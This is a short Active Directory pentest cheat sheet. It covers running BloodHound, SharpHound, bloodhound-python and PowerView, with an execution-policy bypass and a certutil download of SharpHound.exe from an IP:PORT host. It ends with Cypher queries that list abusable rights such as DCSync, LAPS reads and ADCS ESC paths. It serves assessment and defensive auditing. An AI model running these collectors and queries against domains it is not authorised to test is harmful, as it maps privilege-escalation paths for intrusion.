BloodHound

#bloodhound #ActiveDirectory #privesc

BloodHound

# Start BloodHound with docker compose from its checkout directory (foreground; Ctrl-C stops the stack).
cd /BloodHound
docker compose up

o bien (alternativa sin docker):

# Alternative to the compose stack: start the local neo4j service, then launch the BloodHound binary
# from the current directory (it expects neo4j to be reachable already).
sudo neo4j start
./BloodHound

SharpHound

# Relax the execution policy for this process only (-Scope Process): nothing persists after the session ends.
Set-ExecutionPolicy Bypass -Scope Process -Force
# `upload` is not a PowerShell cmdlet — presumably the remote shell client's file-upload command;
# /ruta is the local path of the collector and `.` the current remote directory.
upload /ruta .
# NOTE(review): the module name looks truncated — presumably .\SharpHound.ps1; confirm before use.
Import-Module .\Sharp

BloodHound.py

# Sync the local clock against the DC first — presumably so Kerberos does not reject the bind on clock skew.
sudo ntpdate -u IP-DC
# Collect with every collection method (-c All) and write the output as a zip for import into BloodHound.
# -ns is the name server used for domain name resolution. Note: -c All includes session and local-group
# enumeration against every reachable host, which is noisy and readily detected; and a password given with
# -p ends up in shell history and process listings.
bloodhound-python  -d DOMAIN -ns IP -u USER -p PASS -c All --zip
# Variant that names the DC explicitly with -dc instead of relying on lookup alone.
sudo ntpdate -u IP-DC
bloodhound-python  -d DOMAIN -dc DC.DOMAIN -ns IP -u 'USER' -p PASS -c All --zip

`-ns`: servidor de nombres que se usa para resolver los nombres del dominio

bloodhound-ce-python

# Collector for BloodHound Community Edition; same flags as bloodhound-python above (-dc names the DC,
# -ns the name server, -c All every collection method, --zip bundles the output). Same caveats apply:
# -c All is noisy, and the quoted password is still visible in shell history and process listings.
bloodhound-ce-python -d DOMAIN -dc DC.DOMAIN -ns IP -u 'user' -p 'pass' -c All --zip

PowerView

# Relax the execution policy for this process only (-Scope Process).
Set-ExecutionPolicy Bypass -Scope Process -Force
# `upload` is presumably the remote shell client's file-upload command; /ruta is the local path of PowerView.ps1.
upload /ruta .
# Dot-source PowerView so its functions are defined in the current session.
. .\PowerView.ps1
# NOTE(review): this line fetches SharpHound.exe, not PowerView — it looks misplaced in this section.
# certutil -urlcache downloads are a well-known LOLBin pattern that endpoint monitoring commonly flags.
certutil -urlcache -f http://IP:PORT/SharpHound.exe SharpHound.exe

QUERIES 🏁

Qué usuarios/ordenadores del dominio tienen permisos directos sobre otros usuarios/ordenadores

// Every User or Computer node that holds a direct (one-hop) abusable edge onto any other node.
// The edge list covers ACL rights (GenericAll … WriteGPLink), delegation, local-admin/remote-access,
// credential-read (LAPS/GMSA/SMSA), DCSync and the ADCS ESC edges. Only the source node is filtered;
// the target may be any Base node. LIMIT 1000 truncates silently — raise it if the graph is large.
MATCH p=(n:Base)-[r:GenericAll|GenericWrite|WriteOwner|WriteDacl|ForceChangePassword|AllExtendedRights|AddMember|AllowedToDelegate|AllowedToAct|AdminTo|CanPSRemote|CanRDP|ExecuteDCOM|AddSelf|DCSync|ReadLAPSPassword|ReadGMSAPassword|DumpSMSAPassword|AddAllowedToAct|WriteSPN|AddKeyCredentialLink|SyncLAPSPassword|WriteAccountRestrictions|WriteGPLink|ADCSESC1|ADCSESC3|ADCSESC4|ADCSESC6a|ADCSESC6b|ADCSESC9a|ADCSESC9b|ADCSESC10a|ADCSESC10b|ADCSESC13|WriteOwnerLimitedRights|OwnsLimitedRights|CanApplyGPO|ManageCA|ManageCertificates]->(:Base)
WHERE (n:User OR n:Computer)

// Uncomment the below to only search enabled principals (disabled accounts still show up otherwise).
// AND n.enabled = true

RETURN p
LIMIT 1000

Qué grupos del dominio tienen permisos directos sobre otros usuarios/ordenadores, excluyendo los grupos de administradores y operadores

// Every Group with a direct abusable edge onto any node, minus the expected admin/operator groups,
// to surface "shadow admins": non-obvious groups that still hold dangerous rights.
MATCH p=(n:Group)-[r:GenericAll|GenericWrite|WriteOwner|WriteDacl|ForceChangePassword|AllExtendedRights|AddMember|AllowedToDelegate|AllowedToAct|AdminTo|CanPSRemote|CanRDP|ExecuteDCOM|AddSelf|DCSync|ReadLAPSPassword|ReadGMSAPassword|DumpSMSAPassword|AddAllowedToAct|WriteSPN|AddKeyCredentialLink|SyncLAPSPassword|WriteAccountRestrictions|WriteGPLink|ADCSESC1|ADCSESC3|ADCSESC4|ADCSESC6a|ADCSESC6b|ADCSESC9a|ADCSESC9b|ADCSESC10a|ADCSESC10b|ADCSESC13|WriteOwnerLimitedRights|OwnsLimitedRights|CanApplyGPO|ManageCA|ManageCertificates]->(:Base)

// NOTE: these exclusions are ACTIVE (the original note said "uncomment", but the lines below are not
// commented out). Comment out or delete the WHERE/AND lines to see the Administrators, Operators and
// Exchange groups as well. CONTAINS is case-sensitive, so the literals must match the stored name case;
// CONTAINS "ADMIN" also drops any custom group whose name merely contains ADMIN — those may be worth a look.
WHERE NOT n.name CONTAINS "ADMIN" 
AND NOT n.name CONTAINS "ACCOUNT OPERATORS"
AND NOT n.name CONTAINS "BACKUP OPERATORS"
AND NOT n.name CONTAINS "PRINT OPERATORS"
AND NOT n.name CONTAINS "EXCHANGE"


RETURN p
LIMIT 1000